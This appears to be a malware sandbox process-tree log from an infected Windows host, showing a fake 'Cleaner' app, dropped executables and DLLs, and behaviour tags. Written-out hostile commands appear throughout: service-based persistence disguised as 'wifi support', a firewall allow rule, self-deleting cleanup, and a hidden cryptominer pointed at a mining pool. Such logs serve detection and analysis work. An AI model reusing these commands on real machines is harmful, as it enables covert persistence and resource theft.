                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1648,9223319845776663984,8672693183822012090,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9080_1288145247" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2588 /prefetch:1
                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                                                            PID:6636
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1648,9223319845776663984,8672693183822012090,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9080_1288145247" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3212 /prefetch:2
                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                              PID:9780
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1648,9223319845776663984,8672693183822012090,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9080_1288145247" --mojo-platform-channel-handle=3632 /prefetch:8
                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                PID:9872
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1648,9223319845776663984,8672693183822012090,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9080_1288145247" --mojo-platform-channel-handle=3252 /prefetch:8
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                  PID:10028
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1648,9223319845776663984,8672693183822012090,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9080_1288145247" --mojo-platform-channel-handle=3412 /prefetch:8
                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                    PID:10216
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1648,9223319845776663984,8672693183822012090,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9080_1288145247" --mojo-platform-channel-handle=3168 /prefetch:8
                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                      PID:4328
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1648,9223319845776663984,8672693183822012090,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9080_1288145247" --mojo-platform-channel-handle=2072 /prefetch:8
                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                        PID:2140
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_37C8.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:1320
                                                                                                                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                                  PID:4280
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                    PID:7824
                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                  PID:2744
                                                                                                                                                                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                  PID:704
                                                                                                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                  PID:6304
                                                                                                                                                                                                                                                  • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                    DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{7fd0ad07-799b-3343-968e-707bcd7ce74b}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                    PID:3764
                                                                                                                                                                                                                                                  • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                    DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                    • Drops file in Drivers directory
                                                                                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                    PID:6836
                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                  PID:3864
                                                                                                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:3200
                                                                                                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                    PID:1828
                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                    PID:7768
                                                                                                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                    PID:6660
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:8300
                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                      PID:3328
                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                      PID:8300
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\C5ED.exe
                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\C5ED.exe
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                      PID:8468
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\CAA1.exe
                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\CAA1.exe
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:6036
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\D476.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\D476.exe
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                                                        PID:9204
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im D476.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\D476.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:8368
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                              taskkill /im D476.exe /f
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                                                              PID:4024
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                              timeout /t 6
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                                                                                              PID:396
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\EF90.exe
                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\EF90.exe
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                          PID:8904
                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                          PID:5416
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\E7.exe
                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\E7.exe
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:4348
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\nanlnuyc\
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:9104
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\swdhjmco.exe" C:\Windows\SysWOW64\nanlnuyc\
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:7624
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                  "C:\Windows\System32\sc.exe" create nanlnuyc binPath= "C:\Windows\SysWOW64\nanlnuyc\swdhjmco.exe /d\"C:\Users\Admin\AppData\Local\Temp\E7.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:9008
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                    "C:\Windows\System32\sc.exe" description nanlnuyc "wifi internet conection"
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:6616
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                      "C:\Windows\System32\sc.exe" start nanlnuyc
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:9076
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                          PID:8628
                                                                                                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                            PID:9172
                                                                                                                                                                                                                                                                        • C:\Users\Admin\swdhjmco.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\swdhjmco.exe" /d"C:\Users\Admin\AppData\Local\Temp\E7.exe"
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                            PID:8948
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\oxfdwybb.exe" C:\Windows\SysWOW64\nanlnuyc\
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                PID:4436
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                "C:\Windows\System32\sc.exe" config nanlnuyc binPath= "C:\Windows\SysWOW64\nanlnuyc\oxfdwybb.exe /d\"C:\Users\Admin\swdhjmco.exe\""
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                  PID:2884
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\System32\sc.exe" start nanlnuyc
                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                    PID:6764
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                      PID:4624
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:8708
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\82B.exe
                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\82B.exe
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:4524
                                                                                                                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                        PID:5224
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                          PID:8696
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\E76.exe
                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\E76.exe
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                          PID:4396
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                            PID:7884
                                                                                                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                            • Drops startup file
                                                                                                                                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                            PID:7880
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\19C1.exe
                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\19C1.exe
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                              PID:9080
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\19C1.exe
                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\19C1.exe"
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                                                                                                                PID:4348
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\19C1.exe
                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\19C1.exe"
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                PID:3752
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\19C1.exe
                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\19C1.exe"
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                  PID:6028
                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                      PID:4460
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                  PID:6380
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                    PID:2812
                                                                                                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                    PID:2056
                                                                                                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                      PID:4460
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                        PID:4412
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                          PID:8384
                                                                                                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                            PID:8576
                                                                                                                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                            PID:4196
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                              PID:8456
                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                              PID:7408
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                PID:7304
                                                                                                                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                              PID:7128
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                PID:9056
                                                                                                                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                PID:7840
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                  PID:4420
                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                  PID:8052
                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                                                                                                                    MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                    PID:8952
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\nanlnuyc\oxfdwybb.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\nanlnuyc\oxfdwybb.exe /d"C:\Users\Admin\swdhjmco.exe"
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                  PID:1176
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                    svchost.exe
                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                    PID:8100
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                      svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                        PID:4152
